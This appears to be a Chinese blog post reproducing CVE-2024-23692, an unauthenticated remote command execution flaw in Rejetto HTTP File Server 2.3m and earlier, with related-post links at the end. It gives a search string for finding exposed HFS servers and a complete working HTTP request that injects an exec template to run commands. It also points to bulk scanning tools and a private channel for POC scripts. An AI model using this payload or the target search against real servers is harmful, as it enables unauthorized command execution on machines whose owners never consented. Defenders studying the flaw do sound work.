【漏洞复现】Rejetto HTTP文件服务器 未授权RCE漏洞(CVE-2024-23692)

0x01 产品简介

Rejetto HTTP File Server(HFS)是一个基于HTTP协议的文件服务器软件,旨在为用户提供简单、轻量级且易于使用的文件共享解决方案。功能强大、易于使用的文件服务器软件,无论是个人使用还是团队协作,HFS都能满足用户的需求,提高工作效率。

0x02 漏洞概述

Rejeto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。 成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。

0x03 搜索语法

bash 复制代码
app="HFS"

0x04 漏洞复现

bash 复制代码
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子

相关推荐
kali-Myon9 天前
ctfshow-web入门-命令执行(web53-web55)
前端·学习·web安全·网络安全·php·web·rce
0415i15 天前
Hack The Box-Blurry
pickle·提权·rce·hack the box·clearml·cve-2024-24590
SuperherRo19 天前
【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)
rce·apache ofbiz
I_WORM2 个月前
CTFHUB RCE作业
rce·命令执行·ctfhub·作业
阿呆不呆@qq3 个月前
无参数绕过RCE
web安全·php·rce
Jay 174 个月前
CVE-2012-1823 漏洞复现
web安全·网络安全·php·cve·漏洞复现·rce
Jay 175 个月前
第二届 N1CTF Junior WEB方向 部分题解WP
web安全·网络安全·php·ctf·rce
Z3r4y5 个月前
【Web】CVE-2021-22448 Log4j RCE漏洞学习
java·网络安全·log4j·cve·rce·cve-2021-22448
扣脚大汉在网络8 个月前
[2016-2018]phpstudy的exp制作
漏洞·rce·exp